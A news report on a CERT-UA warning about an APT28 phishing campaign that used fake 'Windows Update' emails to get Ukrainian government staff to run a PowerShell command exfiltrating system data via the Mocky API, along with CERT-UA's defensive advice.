Ukraine’s Computer Emergency Response Team (CERT-UA) has issued a warning regarding cyber attacks targeting multiple government entities in the country, carried out by Russian state-sponsored hackers.
The phishing campaign has been linked to APT28, a group that operates under various aliases such as Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.
As part of their operation, the attackers utilized genuine employee names, which they obtained through undisclosed methods, to create @outlook.com email addresses during the initial phases of the attack.
Rather than providing legitimate instructions for upgrading Windows systems, the malicious emails instead advise recipients to execute a PowerShell command.
The emails bear the subject line “Windows Update” and include instructions in Ukrainian directing the recipient to run a PowerShell command under the guise of installing security updates.
Upon running the command, a subsequent PowerShell script is loaded and executed, which gathers basic system information using commands like “tasklist” and “systeminfo“.
The collected data is then extracted via an HTTP request to a Mocky API.
According to BleepingComputer, who first broke the news, Mocky API is a legitimate application that allows users to create custom HTTP responses.
In this case, APT28 exploited the service for the purposes of data exfiltration.
To prevent similar attacks, CERT-UA advises system administrators to limit the ability to execute PowerShell on critical computers and monitor network traffic for any connections to the Mocky service API.
To deceive the targets into running the PowerShell command, the phishing emails impersonated system administrators of the targeted government entities, utilizing fake Microsoft Outlook email accounts that were created using the employees’ genuine names and initials.
This further cements our coverage of a recent report from Google’s Threat Analysis Group, which highlights that approximately 60% of all phishing emails were directed toward Ukraine in the first quarter of 2023.
The report mentions these phishing emails were traced back to Russian threat actors and specifically highlights APT28 as a significant perpetrator of this nefarious activity.